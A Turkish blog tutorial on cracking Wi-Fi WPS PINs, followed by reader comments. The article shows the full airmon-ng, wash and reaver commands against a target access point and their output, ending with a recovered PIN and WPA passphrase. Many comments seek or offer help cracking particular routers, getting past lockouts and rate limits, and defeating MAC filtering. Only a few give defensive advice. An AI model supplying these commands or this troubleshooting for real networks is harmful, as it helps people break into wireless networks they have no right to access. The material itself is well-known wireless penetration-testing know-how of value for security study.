WPS (Wi-Fi Protected Setup) teknolojisi, kablosuz ağın güvenlik ayarlarını kolayca ayarlamak için kullanılan esnek bir teknolojidir.
Kablosuz ağ cihazını yapılandırırken, üzerinde bulunan PIN numarası ile cihazın yapılandırılmasını sağlar.
Saldırgan, WPS’de bulunan güvenlik zaafiyeti ile bu PIN numarasını tahmin ederse WPA/WPA2 anahtarını ele geçirebilir. WPA/WPA2 anahtarı ne kadar karmaşık ve uzun olursa olsun, PIN numarası tahmin edildiğinde anahtar elde edilebilir.
Örnek Uygulama
Bu işlemleri yapmak için, ağ kartının monitor modu desteklemesi lazım.
# airmon-ng start wlan0
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!PID Name
976 dhclient3
2077 dhclient
2134 dhclient3
Process with PID 2134 (dhclient3) is running on interface wlan0Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb – [phy0]
(monitor mode enabled on mon0)
WPS destekli kablosuz ağları bulmak için,
# wash -i mon0 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
00:88:11:66:99:11 1 -69 1.0 No ANGARA
00:22:6B:F1:33:2E 9 -39 1.0 No BGA
88:FF:11:99:77:33 11 -56 1.0 No SECLABS_Network
00:22:66:11:49:AA 11 -72 1.0 No BGAKADEMIS
I
Hedefimizde “BGA” kablosuz ağı var, bu cihazın BSSID değerini ve yayın yaptığı kanal numarasını not edelim.
BSSID = 33:22:55:22:11:2F
CH = 9
# reaver -i mon0 -b 33:22:55:22:11:2F -c 9 -vv –no-nack -d 5 -f -x298
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Switching mon0 to channel 9
[+] Waiting for beacon from 33:22:55:22:11:2F
[+] Associated with 33:22:55:22:11:2F (ESSID: BGA)
[+] Trying pin 47128211
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: ‘47128211’
[+] WPA PSK: ‘benimgizliparolam876!#’
[+] AP SSID: ‘BGA’
[+] Nothing done, nothing to save.
Modemin WPS özelliği kapalıda olsa, saldırı başarılı olabiliyor. Teorik olarak WPS PIN numarasını tespit etmek maksimum 10 saat sürüyor, pratikte bazı özel durumlarda hedef kablosuz ağa bağlantılar zaman aşımına uğrayabilir ve bu zaman uzayabilir.
Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr
49 Yorum
Bu konunun en güncel kali sürümü ile revizyon edilmedi gerektiğini düşünüyorum
wash -i mon0 -C komutundan sonra imleç sürekli yanıp sönüyor ama hiç ağ bulamıyor???
Yuzde 90 da kalir tabi cunku messanger 2 aliyor masanher 4 almiyor almadi icin ilk 4 hane bulamiyor diger 4 hane denicn yani son 4 hane bu cözumle hepsini kirarsin bu programlar yapmaz bunu
bir soru daha 🙂 daha önce modemlerin mac adreslerinin son altı hanesi wps pini veriyordu şimdi wps kilitlemeli modemlerin mac adreslerinden gerçek wps pin elde edilemiyor, ortaya çıkan wps pinler hep yanlış oluyor. deneme yapıp modemi kilitlemeden wps yi öğrenmenin başka yolu yokmu?
merhaba modemlerin belirli bir pin wps pin denemesinden sonra wps modunu kapatmasına hala bir çözüm bulunmadımı?
merhaba modemlerin belirli wps pin denemesinden sonra wps yi kapatmasına hala bir çözüm bulunmadımı?
Kali 2'de mon0 yok, wlan0mon olarak görmeniz normal.
yukaridaki komutta mon0 yazan yerleri wlan0mon ile degistirin
airmon-ng start wlan0 komutunda yukaridaki ciktigi aldigin icin once airmon-ng check kill komutunu girip calisan uygulamalari kapatin daha sonra airmon-ng start wlan0 komutunu girin. sorun cozulecektir.
Selam arkadaslar.Bende dahil olmak üzere bir çok arkadaş reaverin %99kalma sorunu yasiyor.Bunun sebebi wps pinler 8 haneden ikili grup halinde olusur reaver ilk 4 hanesini dogru tespit edemedigi icin %90 veye %99 kadar gidip ondan sonra hep ayni wps pini dener.
Şuan ZyXEL marka bi modem kirmaya calisiorm fakat reaver 1.3 ve 1.4 de denedim yni sorunla karsilastim.
Bunun çözümūnü bilen arkadaslar varsa lutfen yardim edin.
airmon-ng start wlan0 komutundan sonra mon yazmıyor mon0 veya 1 ıse yaramıyor wlan0mon yazıyor
Ben bunları nasıl yapcam bi tane kırdı sadece
Reaver ile alınan ap rate limited sorunsalına çözüm teşkil edecek bir öneriniz var mıdır?
Merhaba
wash -i mon0 -C çalıştırdığımda ekrana tablo geliyor ancak içi boş. Herhangi bir wifi network yok. bunun sebebi nedir? ağ kartımın injection ı destekleyip desteklemediğini görmem için verdiğiniz link çalışmıyor. sanırım kaldırılmış içerik.
ekrandaki çıktı şu şekilde kalıyor. ne yapmamı önerirsiniz? problem nedir sizce?
# airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
779 avahi-daemon
785 avahi-daemon
856 NetworkManager
1263 wpa_supplicant
1553 dhclient
Process with PID 1553 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Intel 5100 iwlwifi – [phy0]
(monitor mode enabled on mon0)
root@MrWhoSys:/home/mrwho# wash -i mon0 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
wsc nack bende de diyo
Merhaba.
Ben windows ortamda Dummper.exe ile RALink AP leri (RT2860) 5 – 10 saniye içerisinde kırıp networke dahil olabiliyorum. ancak diğer cihazlarda, chipsetlerde pek başarılı olduğu söylenemez. Webde biraz araştırdığımda dummper.exe nin pinleri saldırdığı cihazın mac adresinden hesapladığını, mac adreslerinden wps pinlerine ulaşılabildiğini okudum. dummper ı ilk çalıştırıp sinyalleri taradığınız anda bulduğu networkleri pinleri ile birlikte listeliyor. sizin bu konu hakkında bilginiz ve görüşleriniz nelerdir paylaşırmısınız? sizin görüşleriniz deneyimleriniz benim için oldukça değerli. İyi çalışmalar. 🙂
Benzer problem başkaları tarafından da yaşanmış, benim yorumumda ağ kartınızı, hedef ağa uzaklığınızı ve güncel reaver sürümünü denemeniz yönünde olur. Daha açık bir yorumum yok maalesef.
[+] Sending identity response
bende bundan sora hic bisey gelmiyor neden??
Linux kurulu bir bilgisayara adresinden indirip kullanabilirsin.
pin kullanarak parolayı elde edip bağlanmayı deneyebilirsin 😉
ben pini biliom ama wirfiye nasıl bağlanıyım
Teşekkürler.
Attacker, ağınızın parolasını bilsede/bilmesede bağlı kullanıcıların MAC adresini görebiliyor. Dolayısıyla bağlı kullanıcının mac adresini kendi ağ cihazına tanımlayarak (macchanger aracı ile olabilir) bağlantı sağlayabilir. Mac filtreleme gerçek manada bir güvenlik sağlamaz.
WPS Kapatın, WPA2 kompleks parola set edin ve belirli periyodlarla değişitin, ESSD gizleyin büyük oranda güvende kalabilirsiniz.
td854-w mu? Benim modem. 1.3'e falan girmenize ne gerek vardı şimdi 🙂
Modemin arayüz ayarlarından "izinli liste" dışında ki bağlantı isteklerini engellemiş durumdayım. Yani modeme bağlanmak isteyen cihaz şifreyi kırsa/bilse dahi mac adresi "izinli listeye" kayıtlı değil ise bağlantıya izin verilmiyor. Yani en azından teoride bu şekilde işliyor ve yine modemin arayüzünden hatta bağlı tüm cihazlar görülebiliyor. Peki bu durumu aşmanın; listeye rağmen bağlantı sağlamanın üstelik bağlı cihazlar listesinde görünmeyi gizlemenin yolu var mıdır?
Demem o ki, güvende sayılır mıyım?
Nasıl ???
Slm, biri şu wifi şifresini kırma programının indirme linkini gönderebilir mi? Birkaç yerde indirdim açılmıyor
-c 1 derseniz, 1. kanala geçer.
Tek tek kanalları arıyo demek, eğer kanalı biliyosan direk hangi kanalda arama yapacağını söyleyip öyle reaver yap
Sinyal Seviyesi Yeterli Değildir….
ben bir türlü beceremedim tinycore şu kaplan olan linux her neydi adı onu kullanıyordum ama pin atarken ya 300sn hatası yada herhangi bir şey veriyor bir türlü kıramadım valla tabi denediklerim -80 powerden aşşagı degildide
10 saat mi 🙂 Kodladım exp 30 yada 40 saniye 😀
arkadaşlar ben bt5 r3 kullanıyorum reavere geçip bssıd yazdıp enter a bastıktan sonra bu yazı ile karşılaşıyorum Switching mon0 to channel 1
buna benzer butun kanal isimleri geçiyor 12 kanal var hepsinin adı bu şekilde geçiyor bi de arada
Warning: Filed to associate vith 08:25:E5:D8:61:12 (ESSID: başkan) nasıl duzelteblirim yardımcı olacak arkaaşlara şimdiden teşekkur ederim.
backtrack 5 r3 en son çıkanı
wep şifresi 5-10 dk arasında kırılır. wpa şifreleri pin biliyorsan kısa sürer eğer bilmiyorsan pin deneme işlemini otomatik olarak yapması gerekiyor bu sürede ortalama 10 saat sürer
yes yazanlar wpsa kapalı demek bunları kırmayı deneme
reaver yönemi ile bir tane şifre kırdım ancak bunun dışında denediğim 2 tane dağa wifi var ve ikisinde de pin deneme işlemi sırasında %90.9 a geldiğinde pin değişmiyor. Aynı pini %90.9 da tekrarlayıp duruyor ve bu ili ayrı wifi adresinde de aynı pinde tekrarlıyor. airodump yapıp pakette topladım ama fayda etmiyor. Sorunumu bilen varsa yardım edermisiniz.
-p parametresi ile istediğiniz ping numarasını deneyebilirsiniz. Komutun sonuna -p pin_no ekleyerek çalıştırabilirsiniz.
Bilen var ise söylesin lütfen;
Xiaopan'da Sadece istediğimiz Wps pin i nasıl denetebiliriz ? 12345670 dan başlamasın sadece istediğimiz pini denesin
Reaver yetersiz kalabiliyor, airplay-ng ile sahte ataklarla yazmış olduğunuz problemlerin bağzılarını aşabilirsiniz.
burdaki söyleninleri görsel yada video olarak anlatan varmı?
bu uyarı 18:28:61 mac adresiyle başlayan airties marka modemlerde karşılarsın bu modemler kendini 5 denemden sonra kitler ve başka pin taramasına izin vermez ondan dolayı bu modemlerde reaver pek işe yaramıyor.
ali arkadaşın sorusuna gelince o hata ise yeterli seviyede çekmeyen modemlerde gerçekleşiyor modem çok uzakta daha yakındaki modemlerde dene yada modemle arandaki mesafe yada duvarları ortadan kaldır.
wps locked yes yazanmodemlerde reaver işlemez . çünkü reaver wps pin ini bulma yöntemiyle çalışır o modemlerde wps aktif olmadığı için pin arayamaz.
burda yazılmamış ama bir hatada td854-w modemler de bir hata oluşuyor bu modemlerde tarama direk %90 dan başlar ve % 99 da takılır kalır bu modemlerde ise bactrack ta reaver 1.3 ü tanıtılması gerekir o şekilde kırılabilir.
evinizde bulunan modemlere başkalarının tebelleş olmamalarını istemiyorsanız tek önerim şimdilik en az 15 haneli ve içerisinde farklı karakterlerin (&%+?1234agdjdk vs. ) bulunması wpa2 şifrelemeli bir şifre koymanız ve wps özelliğini kaldırmanız . he bununda kırılması imkansız değil ama en azından kırmak isteyen en azından biraz uğraşsın yoksa kırılamayacak şifre yoktur sadece zaman alır .
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
sürekli bu hatayı alıyorum çözümü mevcut mu ?
Ali :
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
bende hep bu uyarıyı alıp duruyorum sorun neden kaynaklanıyor kullandığım wireless chipseti realtek rltl8187
[!] WPS transaction failed (code: 0×04), re-trying last pin
aynı şekilde bende de oluyor ??bunun sebebi ne olabilir ? Bu saldırıdan korunmak için neler yapılabilir ???
WPS Locked –>olduğu yerde yes yazıyor bu ne anlama geliyor
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
bende hep bu uyarıyı alıp duruyorum sorun neden kaynaklanıyor kullandığım wireless chipseti realtek rltl8187
[!] WPS transaction failed (code: 0x04), re-trying last pin
Merhaba ortalama kaç saat sürüyor.sanırım 3 saate yakındaki hedefe ulaşılabilir bir de bu açık hangi modemlerde var eskilerde mi yenilerde mi ?
Bu paketlerden kastınız nedir ? Bu yazıda wireless paketlerinden bahsedilmemiştir.
Eğer, kaydedilmiş wireless trafiğini izlemek isterseniz, wireshark kullanabilirsiniz.
Ozan UÇAR
bu paketleri izlemek icin kullanmak gereken program nedir onuda bilirmisiniz ?
[…] Kaynak: Bilgi Güvenliği Akademisi Blog […]